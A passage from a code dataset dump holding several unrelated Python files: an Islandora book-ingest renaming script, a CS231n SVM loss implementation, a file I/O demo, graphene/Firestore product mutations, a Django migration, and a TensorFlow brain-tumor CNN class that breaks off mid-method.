datetime.datetime.now().strftime('%Y-%m-%d')\n ingest_stub = f'{ingest_stub}_{todays_date}'\n\n # create ingest directory\n ingest_directory_name = f'{self.directory_path.name}_{ingest_stub}'\n ingest_directory_path = self.directory_path.parents[0].joinpath(ingest_directory_name)\n # try:\n # ingest_directory_path.mkdir()\n # except FileExistsError: # directory already exists\n # print(f'WARNING: ingest directory already exists at {ingest_directory_path}')\n\n self.directory_path.replace(ingest_directory_path)\n\n image_paths_list = [x for x in ingest_directory_path.glob('*.tif')]\n number_of_images = len(image_paths_list)\n\n print(f'Processing {number_of_images} images in {self.directory_path.name}')\n\n # for each image\n for index, image_path in enumerate(image_paths_list, start=1):\n\n # create a sub-directory with a simple index number\n image_subdirectory_path = ingest_directory_path.joinpath(str(index).zfill(6))\n try:\n image_subdirectory_path.mkdir()\n except FileExistsError:\n print(f'Sub-directory already exists at {image_subdirectory_path}')\n\n # set new image name and copy path, then copy image\n #copy_image_path = image_subdirectory_path.joinpath(image_path.name)\n #shutil.copyfile(image_path, copy_image_path)\n image_path.replace(image_subdirectory_path.joinpath(image_path.name))\n\n 
print(f'Ingest directory created at {ingest_directory_path}')\n print('')\n\n return ingest_directory_path\n\n\n def get_file_paths(self, with_extension):\n '''\n -- Purpose --\n Get all file Paths with_extension in self.directory_path\n\n -- Arguments --\n with_extension: type=string; extension to use for globbing\n\n -- Returns --\n file_paths_list: type:list; list of Path-like objects, 1 Path-like object\n per file_path in self.directory_path\n '''\n formatted_extension = get_formatted_extension(with_extension)\n file_paths_list = sorted(self.directory_path.glob(f'*{formatted_extension}'))\n return file_paths_list\n\n\n def rename_tiffs_to_directory_name(self, with_extension, zerofill=4):\n '''\n -- Purpose --\n Rename all files {with_extension} to {self.directory_path.name}_{str(index).zfill(zerofill)}\n *Note: will currently remediate extensions to lower-case and change tiff/jpeg to tif/jpg\n\n -- Arguments --\n with_extension: type=string; extension to rename\n zerofill: type=integer; how many digits to zeropad\n\n -- Returns --\n None\n '''\n formatted_extension = get_formatted_extension(with_extension)\n\n # extension will be lower-case and tif/jpg instead of tiff/jpeg\n remediated_extension = get_formatted_extension(with_extension, remediate=True)\n\n # get total number of files and the paths for files to rename\n file_paths_list = self.get_file_paths(formatted_extension)\n number_of_files = len(file_paths_list)\n\n print(f'{number_of_files} with {formatted_extension}')\n\n if number_of_files == 0:\n pass\n\n else: # rename files\n backup_directory_path = self.backup_volume()\n\n print(f'Renaming {number_of_files} \"{formatted_extension}\"s in {self.directory_path.name} . . .')\n\n count = 0\n try:\n for index, file_path in enumerate(file_paths_list, start=1):\n # rename TIFF files from Adobe Acrobat for Islandora ingest, i.e. 
FILENAME.extension\n new_file_name = f'{self.directory_path.name.upper()}_{str(index).zfill(zerofill)}{remediated_extension}'\n new_file_path = file_path.parents[0].joinpath(new_file_name)\n file_path.replace(new_file_path)\n count = index\n except IndexError:\n pass\n\n print(f' Renamed {count} \"{formatted_extension}\"s')\n print('')\n\n\n def rename_PDFs_for_ingest(self):\n\n pdf_paths_list = self.get_file_paths('.pdf')\n\n number_of_pdfs = len(pdf_paths_list)\n if number_of_pdfs == 0:\n print(f'{number_of_pdfs} PDFs to process')\n else: # process PDFs\n for pdf_path in pdf_paths_list:\n # expect PDF stems ending in original or processed\n if pdf_path.stem.lower().endswith('original'):\n new_pdf_path = pdf_path.parents[0].joinpath('ORIGINAL.pdf')\n elif pdf_path.stem.lower().endswith('processed'):\n new_pdf_path = pdf_path.parents[0].joinpath('PROCESSED.pdf')\n else: # don't rename\n print(f'{pdf_path} is not original or processed, manually remediate')\n print('')\n continue\n # rename PDF\n print(f'Renaming {pdf_path.name} to {new_pdf_path}')\n print('')\n pdf_path.replace(new_pdf_path)\n\nif __name__ == \"__main__\":\n\n # get file directory to process\n # https://stackoverflow.com/a/14119223\n root = tk.Tk()\n root.withdraw() # NO tk root window pop-up\n directory_path = Path(askdirectory())\n root.destroy() # close tk window\n\n print('')\n print(f'Directory: {directory_path}')\n print('')\n\n # create Volume\n volume = ContinuingPublications_Volume(directory_path)\n\n # rename Adobe Acrobat .tiff files to directory and .tif extension\n volume.rename_tiffs_to_directory_name('.tiff')\n volume.rename_tiffs_to_directory_name('.tif')\n\n # rename PDFs for ingest\n volume.rename_PDFs_for_ingest()\n\n # create Islandora book ingest directory\n ingest_directory_path = volume.create_islandora_ingest_directory()\n\n # create book directory path as needed for Islandora\n book_directory_path = volume.directory_path.parents[0].joinpath('book')\n book_directory_path.mkdir(exist_ok=True)\n\n # move ingest directory into book directory\n final_path = book_directory_path.joinpath(ingest_directory_path.name)\n ingest_directory_path.replace(final_path)\n\n number_of_books = len([x for x in book_directory_path.iterdir() if x.is_dir()])\n print(f'{number_of_books} books in {book_directory_path} for ingest')\n print('')\n\n # keep command window open after running PyInstaller\n print('Press Enter key to close window')\n input()\n","sub_path":"utk_ContinuingPublications_CreateBookIngest.py","file_name":"utk_ContinuingPublications_CreateBookIngest.py","file_ext":"py","file_size_in_byte":9341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"408677587","text":"import numpy as np\nfrom random import shuffle\n\ndef svm_loss_naive(W, X, y, reg):\n \"\"\"\n Structured SVM loss function, naive implementation (with loops).\n\n Inputs have dimension D, there are C classes, and we operate on minibatches\n of N examples.\n\n Inputs:\n - W: A numpy array of shape (D, C) containing weights.\n - X: A numpy array of shape (N, D) containing a minibatch of data.\n - y: A numpy array of shape (N,) containing training labels; y[i] = c means\n that X[i] has label c, where 0 <= c < C.\n - reg: (float) regularization strength\n\n Returns a tuple of:\n - loss as single float\n - gradient with respect to weights W; an array of same shape as W\n \"\"\"\n dW = np.zeros(W.shape)\n num_classes = W.shape[1]\n num_train = X.shape[0]\n loss = 0.0\n delta = 1\n 
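# For each sample, compare every wrong class score with the correct class score (margin delta = 1); each violated margin adds X[i] to that class's gradient column and subtracts it from the correct class's column.\n 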
for i_train in range(num_train):\n scores = X[i_train].dot(W)\n correct_class_score = scores[y[i_train]]\n for j_weight in range(num_classes):\n if j_weight == y[i_train]:\n continue\n margin = scores[j_weight] - correct_class_score + delta # note delta = 1\n if margin > 0:\n loss += margin\n #dW[:, j_weight] += np.clip(X[i_train], -margin, margin)\n #dW[:, y[i_train]] -= np.clip(X[i_train], -margin, margin)\n dW[:, j_weight] += X[i_train]\n dW[:, y[i_train]] -= X[i_train]\n dW /= num_train\n loss /= num_train\n # average over the batch first, then add the regularization term and its gradient\n loss += 0.5 * reg * np.sum(W * W)\n dW += reg * W\n return loss, dW\n\n\ndef svm_loss_vectorized(W, X, y, reg):\n \"\"\"\n Structured SVM loss function, vectorized implementation.\n\n Inputs and outputs are the same as svm_loss_naive.\n \"\"\"\n loss = 0.0\n dW = np.zeros(W.shape) # initialize the gradient as zero\n\n preds = X.dot(W)\n y_true_score = preds[np.arange(preds.shape[0]), y].reshape(preds.shape[0], 1)\n errors = preds - y_true_score + 1\n loss += (errors[errors > 0].sum() - y_true_score.shape[0]) / preds.shape[0]\n loss += 0.5 * reg * np.sum(W * W)\n\n upper_margin_mask = (preds > np.reshape(preds[np.arange(preds.shape[0]), y] - 1, (preds.shape[0], 1)))\n y_true_mask = preds == np.reshape(preds[np.arange(preds.shape[0]), y], (preds.shape[0], 1))\n has_upper_margin = upper_margin_mask.sum(1) > 1\n y_need_change = (-1) * (upper_margin_mask.sum(1).reshape(-1,1)) * (y_true_mask & has_upper_margin.reshape(-1, 1))\n change = upper_margin_mask + y_need_change\n\n for i_col in range(dW.shape[1]):\n dW[:, i_col] = (X * change[:, i_col].reshape(-1, 1)).sum(0)\n dW /= y.shape[0]\n dW += reg * W # gradient of the regularization term\n return loss, dW\n","sub_path":"assigment1/cs231n/classifiers/linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"359360805","text":"#Printing to the Screen\nprint(\"Python is really a great language,\", \"isn't it?\")\n\n#Reading Keyboard Input\nuser_input = input(\"Enter your input: \")\nprint(\"Received input is:\", user_input)\n\n# Reading and Writing Files\n# write to the file\nfile = open(\"./files/forwrite.txt\", \"w\")\nfile.write(\"Hello world and hello universe too\")\nfile.close()\n\n# now read the file back\nfile = open(\"./files/forwrite.txt\", \"r\")\nprint(file.read())\nfile.close()","sub_path":"files_io.py","file_name":"files_io.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"595428893","text":"from graphene import Mutation as ObjectMutation, ID, Boolean, List, String, ObjectType, Int\nfrom . import PRODUCT_LIKE_COLLECTION, PRODUCT_COLLECTION, PRODUCT_REPORT_COLLECTION, PRODUCT_BOOKMARK_COLLECTION\nfrom ..utils.utils import increase_or_decrease_a_document_field, remove_documents_from_a_collection\nimport logging\n\n\nclass ToggleLikeProduct(ObjectMutation):\n ok = Boolean(required=True)\n errorList = List(\n String,\n required=False,\n )\n\n class Arguments:\n toProductId = ID(required=True)\n\n async def mutate(self, info, **kwargs):\n \"\"\"\n add a like to the product, or remove it if one already exists\n \"\"\"\n ok: bool = False\n errorList: list = list()\n user = info.context[\"request\"].user\n existingLikeRelationDocuments: list = list()\n\n # check authenticated or not:\n if user.is_authenticated:\n toProductId: str = kwargs.get(\"toProductId\", \"\").strip()\n myUserId: str = getattr(user, \"id\", \"\")\n if toProductId != \"\":\n if myUserId != \"\":\n 
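# Toggle semantics: if a like document already exists for this user/product pair, the background task further down removes it; otherwise a new like document is created and \"number_of_likes\" is adjusted to match.\n 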
# looking for an existing like relationship between this user and this product:\n try:\n fetchResultGenerator = PRODUCT_LIKE_COLLECTION.where(\n u\"from_user_id\",\n u\"==\",\n u\"{}\".format(myUserId)\n ).where(\n u\"to_product_id\",\n u\"==\",\n u\"{}\".format(toProductId)\n ).stream()\n except Exception as e:\n logging.error(f\"Error getting user-product like: {e}.\")\n else:\n for like in fetchResultGenerator:\n existingLikeRelationDocuments.append(like)\n if len(existingLikeRelationDocuments):\n ok = True\n else:\n try:\n PRODUCT_LIKE_COLLECTION.add({\n u\"from_user_id\": myUserId,\n u\"to_product_id\": toProductId\n })\n except Exception as e:\n logging.error(f\"Error liking product: {e}.\")\n else:\n ok = True\n else:\n logging.error(\"Couldn't get user id.\")\n else:\n errorList.append(\"Product id is required.\")\n else:\n errorList.append(\"You have to be logged in to like this product.\")\n\n if ok and not len(errorList):\n background = info.context[\"background\"]\n amount = len(existingLikeRelationDocuments)\n if amount:\n background.add_task(\n remove_documents_from_a_collection,\n existingLikeRelationDocuments\n )\n # IMPORTANT: you have to increase || decrease \"number_of_likes\" from \".models.ProductLikeType\"\n background.add_task(\n increase_or_decrease_a_document_field,\n PRODUCT_COLLECTION,\n toProductId,\n \"number_of_likes\",\n 1 if amount == 0 else -amount\n )\n\n return ToggleLikeProduct(\n ok=ok,\n errorList=errorList\n )\n\n\nclass ReportProduct(ObjectMutation):\n ok = Boolean(required=True)\n errors = List(\n String,\n required=False\n )\n\n class Arguments:\n toProductId = ID(required=True)\n product_problems = List(Int, required=True)\n description = String(required=True)\n confirmation = Boolean(required=False)\n\n async def mutate(self, info, **kwargs):\n \"\"\"\n send a report if this user has not already sent one\n \"product_problems\" can contain at most 3 problems\n \"\"\"\n from google.cloud.firestore_v1.document import DocumentSnapshot\n ok, errors = False, list()\n user = info.context[\"request\"].user\n\n if user.is_authenticated:\n # get this user id, refer to \"middleware.auth.py\"\n myUserId = getattr(user, \"id\", \"\")\n toProductId, product_problems, description, confirmation = [\n kwargs.get(key, \"\") for key in [\"toProductId\", \"product_problems\", \"description\", \"confirmation\"]\n ]\n if (toProductId == \"\") and (product_problems == [] or product_problems == \"\") and (description == \"\"):\n # it doesn't matter if a user submitted 'confirmation' or not\n errors.append(\"Please provide your information.\")\n elif toProductId != \"\":\n if (product_problems == [] or product_problems == \"\") and (description == \"\"):\n errors.append(\"Please enter the problems of this product.\")\n else:\n # check whether a report already exists:\n if myUserId != \"\":\n try:\n reportsGenerator = PRODUCT_REPORT_COLLECTION.where(\n u\"to_product_id\",\n u\"==\",\n u\"{}\".format(toProductId)\n ).where(\n u\"from_user_id\",\n u\"==\",\n u\"{}\".format(myUserId)\n ).stream()\n except Exception as e:\n logging.error(f\"Error fetching reports: {e}.\")\n else:\n reportsList = [\n report for report in reportsGenerator\n ]\n if len(reportsList):\n # the user already reported this product.\n # update this report based on the new values:\n yourReport = reportsList[0]\n if isinstance(yourReport, DocumentSnapshot):\n try:\n yourReport.reference.update({\n u\"from_user_id\": myUserId,\n u\"to_product_id\": toProductId,\n u\"product_problems\": product_problems,\n u\"description\": description,\n u\"confirmation\": False if not 
isinstance(confirmation, bool) else confirmation\n })\n except Exception as e:\n logging.error(\n f\"Error updating report: {e}.\"\n )\n else:\n ok = True\n else:\n pass\n else:\n # create new report.\n try:\n PRODUCT_REPORT_COLLECTION.add({\n u\"from_user_id\": myUserId,\n u\"to_product_id\": toProductId,\n u\"product_problems\": product_problems,\n u\"description\": description,\n u\"confirmation\": False if not isinstance(confirmation, bool) else confirmation\n })\n except Exception as e:\n logging.error(\n f\"Error reporting this product: {e}.\"\n )\n else:\n ok = True\n else:\n errors.append(\n \"Error reporting this product. Please try again.\"\n )\n else:\n errors.append(\"You have to login to report this product.\")\n\n return ReportProduct(\n ok=ok,\n errors=errors\n )\n\n\nclass ToggleBookmarkProduct(ObjectMutation):\n \"\"\"\n if product is already bookmarked by this user, delete the bookmark relationship\n if not:\n add 1 bookmark\n \"\"\"\n ok = Boolean(required=True)\n errors = List(\n String,\n required=False\n )\n\n class Arguments:\n toProductId = ID(required=True)\n\n async def mutate(self, info, **kwargs):\n ok, errors = False, list()\n bookmarkListToRemove: list = list()\n\n user = info.context[\"request\"].user\n if user.is_authenticated:\n myUserId = getattr(user, \"id\", \"\")\n toProductId = kwargs.get(\"toProductId\", \"\").strip()\n if toProductId != \"\":\n if myUserId != \"\":\n # check bookmark or not:\n try:\n bookmarkRelationGenerator = PRODUCT_BOOKMARK_COLLECTION.where(\n u\"from_user_id\",\n u\"==\",\n u\"{}\".format(myUserId)\n ).where(\n u\"to_product_id\",\n u\"==\",\n u\"{}\".format(toProductId)\n ).stream()\n except Exception as e:\n logging.error(f\"Error fetching product bookmark: {e}.\")\n else:\n for bookmark in bookmarkRelationGenerator:\n bookmarkListToRemove.append(bookmark)\n if len(bookmarkListToRemove):\n ok = True\n else:\n # add bookmark:\n try:\n PRODUCT_BOOKMARK_COLLECTION.add({\n u\"from_user_id\": myUserId,\n u\"to_product_id\": toProductId\n })\n except Exception as e:\n errors.append(\n \"Error bookmarking this product.\")\n logging.error(f\"Error adding bookmark: {e}.\")\n else:\n ok = True\n else:\n logging.error(\n f\"Error getting current user id: <{ToggleBookmarkProduct.__name__}>.\"\n )\n else:\n errors.append(\"Error identifying product. 
Please try again.\")\n else:\n errors.append(\"You have to log in to bookmark this product.\")\n\n if ok and len(errors) == 0:\n background = info.context[\"background\"]\n # delete existing bookmarks\n if len(bookmarkListToRemove):\n background.add_task(\n remove_documents_from_a_collection,\n bookmarkListToRemove,\n )\n\n return ToggleBookmarkProduct(\n ok=ok,\n errors=errors,\n )\n\n\nclass Mutation(ObjectType):\n toggle_like_product = ToggleLikeProduct.Field()\n report_a_product = ReportProduct.Field()\n toggle_bookmark_product = ToggleBookmarkProduct.Field()\n","sub_path":"social_api/models/product/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":11695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"198195984","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=254)),\n ('content', models.TextField(max_length=9999999)),\n ('publish_date', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=64)),\n ],\n ),\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=32)),\n ('friends', models.ManyToManyField(related_name='_userprofile_friends_+', to='wiki.UserProfile', blank=True)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AddField(\n model_name='article',\n name='author',\n field=models.ForeignKey(to='wiki.UserProfile'),\n ),\n migrations.AddField(\n model_name='article',\n name='category',\n field=models.ForeignKey(to='wiki.Category'),\n ),\n ]\n","sub_path":"wiki/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"444587312","text":"# Brain Tumor Classification\n# Script for Creating Models\n# Author: Qixun Qu\n# Create on: 2017/10/12\n# Modify on: 2017/11/28\n\n# ,,, ,,,\n# ;\" '; ;' \",\n# ; @.ss$$$$$$s.@ ;\n# `s$$$$$$$$$$$$$$$'\n# $$$$$$$$$$$$$$$$$$\n# $$$$P\"\"Y$$$Y\"\"W$$$$$\n# $$$$ p\"$$$\"q $$$$$\n# $$$$ .$$$$$. 
$$$$'\n# $$$DaU$$O$$DaU$$$'\n# '$$$$'.^.'$$$$'\n# '&$$$$$&'\n\n'''\n\nClass BTCModels\n\n-1- Define several basic helper functions, which are the\n basic modules to build simple CNN models.\n-2- Define several specific helper functions to construct\n CNN models with more complicate structures.\n-3- Build models: CNN, Full-CNN, Res-CNN and Dense-CNN,\n and sparsity autoencoder with either KL constraint and\n Winner-Take-All constraint.\n\n'''\n\n\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom operator import mul\nfrom functools import reduce\nfrom tensorflow.python.keras.layers import UpSampling2D\nfrom tensorflow.contrib.layers import xavier_initializer\n\n\nclass BTCModels():\n\n def __init__(self, classes=3, act=\"relu\", alpha=None,\n momentum=0.99, drop_rate=0.5, dims=\"3d\",\n cae_pool=None, lifetime_rate=None):\n '''__INIT__\n\n Initialization of BTCModels. In this functions,\n commen parameters of all models are set first.\n\n Inputs:\n -------\n - classes: int, the number of grading groups\n - act: string, indicate the activation method by either\n \"relu\" or \"lrelu\" (leaky relu)\n - alpha: float, slope of the leaky relu at x < 0\n - momentum: float, momentum for removing average in\n batch normalization, typically values are\n 0.999, 0.99, 0.9, etc\n - drop_rate: float, rate of dropout of input units,\n which is between 0 and 1\n - dims: string, \"3d\" (\"3D\") or \"2d\" (\"2D\")\n - cae_pool: sreing, \"stride\" or \"pool\"\n - lifetime_rate: float, the percentage of how many\n sparsity code are kept in autoencoder\n\n '''\n\n # The number of classes\n self.classes = classes\n\n # Settings for activation\n self.act = act\n self.alpha = alpha\n\n # Settings for batch normalization\n self.momentum = momentum\n self.drop_rate = drop_rate\n\n # Set functions to construct models according to\n # the dimentions of input tensor\n self.dims = dims\n if dims == \"3d\" or dims == \"3D\":\n self.conv_func = tf.layers.conv3d\n self.deconv_func = tf.layers.conv3d_transpose\n self.max_pool_func = tf.layers.max_pooling3d\n self.avg_pool_func = tf.layers.average_pooling3d\n self.concat_axis = 4\n self.right_dims = 5\n elif dims == \"2d\" or dims == \"2D\":\n self.conv_func = tf.layers.conv2d\n self.deconv_func = tf.layers.conv2d_transpose\n self.max_pool_func = tf.layers.max_pooling2d\n self.avg_pool_func = tf.layers.average_pooling2d\n self.concat_axis = 3\n self.right_dims = 4\n else:\n raise ValueError(\"Cannot found dimentions in '2d' or '3d'.\")\n\n # Set encoder function\n self.encoder = None\n if cae_pool is not None:\n if cae_pool == \"stride\":\n self.encoder = self._encoder_stride\n elif cae_pool == \"pool\":\n self.encoder = self._encoder_pool\n else:\n raise ValueError(\"Cannot found pool method in 'stride' or 'pool'.\")\n\n # A symbol to indicate whether the model is used to train\n # The symbol will be assigned as a placeholder while\n # feeding the model in training and validating steps\n self.is_training = None\n\n # A symbol for bottleneck in dense cnn\n self.bc = None\n\n # Set lifetime rate for autoencoder with\n # Winner-Take-All constraint\n self.lifetime_rate = lifetime_rate\n\n return\n\n #\n # Basic Helper Functions\n #\n\n def _conv(self, x, filters, kernel_size, strides=1,\n name=\"conv_var\"):\n '''_CONV\n\n Return 3D or 2D convolutional tensor with variables\n initialized by xavier method.\n\n Usages:\n -------\n - full: self._conv(x, 32, 3, 1, \"conv\")\n - short: self._conv(x, 32, 3)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - 
filters: int, the number of kernels\n - kernel_size: int, the size of kernel\n - strides: int, strides along dimentions\n - name: string, layer's name\n\n Output:\n -------\n - a 3D or 2D convolutional tensor\n\n '''\n\n padding = \"valid\" if kernel_size == 1 else \"same\"\n\n with tf.name_scope(\"conv\"):\n return self.conv_func(inputs=x,\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n kernel_initializer=xavier_initializer(),\n name=name)\n\n def _fully_connected(self, x, units, name=\"fc_var\"):\n '''_FULLY_CONNECTED\n\n Return fully connected tensor with variables\n initialized by xavier method.\n\n Usages:\n -------\n - full: self._fully_connected(x, 128, \"fc\")\n - short: self._fully_connected(x, 128)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - units: int, the number of neurons\n - name: string, layer's name\n\n Outputs:\n --------\n - a fully connected tensor\n\n '''\n\n with tf.name_scope(\"full_connection\"):\n return tf.layers.dense(inputs=x,\n units=units,\n kernel_initializer=xavier_initializer(),\n name=name)\n\n def _batch_norm(self, x, name=\"bn_var\"):\n '''_BATCH_NORM\n\n Normalize the input tensor.\n Momentum and symbol of is_training have been\n assigned while the class is initialized.\n\n Usages:\n -------\n - full: self._batch_norm(x, \"bn\")\n - short: self._batch_norm(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: string, layer's name\n\n Output:\n -------\n - normalized tensor\n\n '''\n\n with tf.name_scope(\"batch_norm\"):\n return tf.contrib.layers.batch_norm(inputs=x,\n decay=self.momentum,\n is_training=self.is_training,\n scope=name)\n\n def _activate(self, x, name=\"act\"):\n '''_ACTIVATE\n\n Activate input tensor. Several approaches can be available,\n which are ReLU, leaky ReLU, Sigmoid or Tanh.\n Activation method and setting has been set while the\n class is initialized.\n\n Usages:\n -------\n - full: self._activate(x, \"act\")\n - short: self._activate(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: string, layer's name\n\n Output:\n -------\n - an activated tensor\n\n '''\n\n with tf.name_scope(\"activate\"):\n if self.act == \"relu\":\n return tf.nn.relu(x, name)\n elif self.act == \"lrelu\":\n f1 = 0.5 * (1 + self.alpha)\n f2 = 0.5 * (1 - self.alpha)\n return f1 * x + f2 * tf.abs(x)\n elif self.act == \"sigmoid\":\n return tf.nn.sigmoid(x, name)\n elif self.act == \"tanh\":\n return tf.nn.tanh(x, name)\n else: # Raise error if activation method cannot be found\n raise ValueError(\"Could not find act in ['relu', 'lrelu', 'sigmoid', 'tanh']\")\n\n return\n\n def _conv_bn_act(self, x, filters, kernel_size, strides=1,\n name=\"cba\", act=True):\n '''_CONV_BN_ACT\n\n A convolution block, including three sections:\n - 3D or 2D convolution layer\n - batch normalization\n - activation\n\n Usages:\n -------\n - full: self._conv_bn_act(x, 32, 3, 1, \"cba\", True)\n - short: self._conv_bn_act(x, 32, 3, 1, \"cba\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - filters: int, the number of kernels\n - kernel_size: int, the size of kernel\n - strides: int, strides along dimentions\n - name: string, layer's name\n - act: string or None, indicates the activation,\n method, if None, return inactivated layer\n\n Output:\n - a convoluted, normalized and activated (if not None) tensor\n\n '''\n\n with tf.variable_scope(name):\n cba = self._conv(x, filters, kernel_size, strides)\n cba = self._batch_norm(cba)\n if act: # If act is None, return inactivated tensor\n cba = 
self._activate(cba)\n\n return cba\n\n def _fc_bn_act(self, x, units, name=\"fba\"):\n '''_FC_BN_ACT\n\n A fully connected block, including three sections:\n - full connected layer with given units\n - batch normalization\n - activation\n\n Usages:\n -------\n - full: self._fc_bn_act(x, 128, \"fba\")\n - short: self._fc_bn_act(x, 128)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - units: int, the number of neurons\n - name: string, layer's name\n\n Output:\n -------\n - a fully connected, normalized and activated tensor\n\n '''\n\n with tf.variable_scope(name):\n fba = self._fully_connected(x, units)\n fba = self._batch_norm(fba)\n fba = self._activate(fba)\n\n return fba\n\n def _max_pool(self, x, psize=2, name=\"max_pool\"):\n '''_MAX_POOL\n\n 3D or 2D max pooling layer.\n\n Usages:\n -------\n - full: self._max_pool(x, 2, 2, \"max_pool\")\n - short: self._max_pool(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - psize: int or a list of ints,\n the size of pooling window, and the\n strides of pooling operation as well,\n if it equals to -1, the function performs\n global max pooling\n name: string, layer's name\n\n Output:\n -------\n - the tensor after max pooling\n\n '''\n\n # Global max pooling if psize is -1\n if psize == -1:\n psize = x.get_shape().as_list()[1:-1]\n\n return self.max_pool_func(inputs=x,\n pool_size=psize,\n strides=psize,\n padding=\"same\",\n name=name)\n\n def _average_pool(self, x, psize=2, name=\"avg_pool\"):\n '''_AVERAGE_POOL\n\n 3D or 2D average pooling layer.\n\n Usages:\n -------\n - full: self._average_pool(x, 2, 2, \"avg_pool\")\n - short: self._average_pool(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - psize: int or a list of ints,\n the size of pooling window, and the\n strides of pooling operation as well,\n if it equals to -1, the function performs\n global max pooling\n name: string, layer's name\n\n Output:\n -------\n - the tensor after average pooling\n\n '''\n\n # Global acerage pooling if psize is -1\n if psize == -1:\n psize = x.get_shape().as_list()[1:-1]\n\n return self.avg_pool_func(inputs=x, pool_size=psize,\n strides=psize, padding=\"same\",\n name=name)\n\n def _pooling(self, x, psize=2, mode=\"max\", name=\"pool\"):\n '''_POOLING\n\n Apply pooling method on input tensor with either\n max pooling or average pooling.\n\n Inputs:\n -------\n - x: tensor, the input tensor\n - psize: int or a list of ints,\n the size of pooling window, and the\n strides of pooling operation as well,\n if it equals to -1, the function performs\n global max pooling\n - mode: string, \"max\" or \"avg\"\n - name: string, layer's name\n\n Output:\n -------\n - the tensor after pooling\n\n '''\n\n if mode == \"max\":\n pool = self._max_pool\n elif mode == \"avg\":\n pool = self._average_pool\n else: # Could not find pooling method\n raise ValueError(\"Pooling mode is 'max' or 'avg'.\")\n\n return pool(x, psize, name)\n\n def _flatten(self, x, name=\"flt\"):\n '''_FLATTEN\n\n Flatten 5D or 4D tensor into 1D tensor.\n\n Usages:\n -------\n - full: self._flatten(x, \"flatten\")\n - short: self._flatten(x)\n\n Inputs:\n -------\n - x: 5D or 4D tensor, input tensor\n - name: string, layer's name\n\n Output:\n -------\n - a flattened tensor\n\n '''\n\n # Obtain the number of features\n # contained in the input layer\n x_shape = x.get_shape().as_list()\n f_shape = reduce(mul, x_shape[1:], 1)\n\n with tf.name_scope(\"flatten\"):\n return tf.reshape(tensor=x, shape=[-1, f_shape], name=name)\n\n def _dropout(self, x, name=\"dropout\"):\n 
'''_DROP_OUT\n\n Apply dropout to the input tensor.\n Drop rate has been set while creating the instance.\n If the is_training symbol is True, apply dropout to the input;\n if not, the untouched input will be returned.\n\n Usage:\n ------\n - full: self._dropout(x, \"dropout\")\n\n Inputs:\n - x: tensor in 5D, 4D or 1D, input tensor\n - name: string, layer's name\n\n Output:\n -------\n - the dropout layer or untouched tensor\n\n '''\n\n return tf.layers.dropout(inputs=x, rate=self.drop_rate,\n training=self.is_training, name=name)\n\n def _logits_fc(self, x, name=\"logits\"):\n '''_LOGITS_FC\n\n Generate logits by fully connected layer.\n The output size is equal to the number of classes.\n\n Usages:\n -------\n - full: self._logits_fc(x, \"logits\")\n - short: self._logits_fc(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: layer's name\n\n Output:\n - logit of each class\n\n '''\n\n with tf.variable_scope(name):\n return self._fully_connected(x, self.classes, name)\n\n #\n # Helper function for full cnn\n #\n\n def _logits_conv(self, x, name=\"logits\"):\n '''_LOGITS_CONV\n\n Generate logits by convolutional tensor.\n The output size is equal to the number of classes.\n\n Usages:\n -------\n - full: self._logits_conv(x, \"logits\")\n - short: self._logits_conv(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: layer's name\n\n Output:\n - logit of each class\n\n '''\n\n x_shape = x.get_shape().as_list()\n with tf.variable_scope(name):\n return self._conv(x, self.classes, x_shape[1:-1], 1)\n\n #\n # Helper function for residual cnn\n #\n\n def _res_block(self, x, filters, strides=1, name=\"res\"):\n '''_RES_BLOCK\n\n The basic block for residual network.\n - check whether shortcut is necessary\n - three convolutional layers\n - obtain shortcut if necessary\n - elementwisely sum convoluted result and original\n inputs (or shortcut if necessary)\n\n Usage:\n -------\n - full: self._res_block(x, [8, 16, 32], 1, \"res\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - filters: list with three ints, indicates the number\n of filters of each convolutional layer\n - strides: int, strides along three dimensions for the\n first convolution layer or the shortcut\n - name: string, layer's name\n\n Output:\n -------\n - a tensor after one residual block\n\n '''\n\n # As default, shortcut is unnecessary\n shortcut = False\n\n # If the shape of output is not same as the input's,\n # now, shortcut has to be obtained\n if (x.get_shape().as_list()[-1] != filters[2]) or strides != 1:\n shortcut = True\n\n # Three convolutional layers\n # Note: the strides of first layer can be changed\n res = 